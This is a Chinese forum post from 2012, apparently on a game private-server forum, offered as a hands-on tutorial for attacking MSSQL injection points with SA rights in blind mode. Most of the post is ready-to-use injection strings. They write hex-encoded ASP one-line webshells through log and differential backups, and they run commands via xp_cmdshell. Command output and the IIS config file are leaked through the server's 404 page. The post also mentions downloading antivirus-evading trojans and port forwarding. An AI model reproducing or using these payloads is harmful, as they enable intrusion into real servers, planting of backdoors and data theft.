设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
MSSQL注入SA权限不显错模式下的入侵
返回列表
发新帖
MSSQL注入SA权限不显错模式下的入侵
[复制链接]
343
|
0
|
2012-4-1 19:17:49
|
显示全部楼层
|
阅读模式
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
我这里使用的是火狐的插件提交参数。跟在浏览器里直接提交一样。
这里的主机环境:MSSQL+JSP权限为不显错的SA,支持多行执行xp_cmdshell存活服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是C:\Windows\Help\iisHelp\common\404b.htm。
思路:
首先:
通过XP_CMDSHELL执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
1.日志备份获得Webshell
2.数据库差异备份获得Webshell
4.直接下载免杀远控木马。
5.直接下载LCX将服务器端口转发出来
6.通过XP_CMDSHELL执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml)分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
◆日志备份:
1.进行初始备份
;AlterDatabaseTestDBSetRecoveryFullDropTabletttCreateTablettt(aimage)BackupLogTestDBtodisk='<e:\wwwroot\m.asp>'WithInit--
2.插入数据
;InsertIntotttValues(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E为一句话木马%><%eval(request(chr(97))):response.end%>
3.备份并获得文件,删除临时表
;BackupLog<数据库名>ToDisk='<e:\wwwroot\m.asp>';DropTabletttAlterDatabaseTestDBSetRecoverySIMPLE--
◆数据库差异备份
(1.进行差异备份准备工作
;Declare@aSysname;Set@a=db_name();Declare@fileVarChar(400);Set@file=<0x633A5C746573742E617370>;DropTabletttCreateTablettt(cImage)BackupDatabase@aToDisk=@file--
上面的0x633A5C746573742E617370是c:\test.asp路径转换后的16进制编码
(2.将数据写入到数据库
;InsertIntotttValues(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E为一句话木马%><%eval(request(chr(97))):response.end%>
3.备份数据库并清理临时文件
;Declare@bSysName;Set@b=db_name();Declare@file1VarChar(400);Set@file1=<0x633A5C746573742E617370>;BackupDatabase@bToDisk=@file1WithDifferential,Format;DropTablettt;--
0x633A5C746573742E617370为c:\test.asp删除临时文件
用^转义字符来写ASP(一句话木马)文件的方法:
1.注入点后执行http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("90"^)^</script^>>c:\mu.asp';--
2.CMD下执行echo^<%execute^(request^("l"^)^)%^>>c:\mu.asp
读取IIS配置信息获取web路径
注入点后面执行;execmaster..xp_cmdshell'copyC:\Windows\system32\inetsrv\MetaBase.xmlC:\Windows\Help\iisHelp\common\404b.htm'--
执行命令
注入点后面执行;execmaster..xp_cmdshell'ver>C:\Windows\Help\iisHelp\common\404b.htm'--
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
3K
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)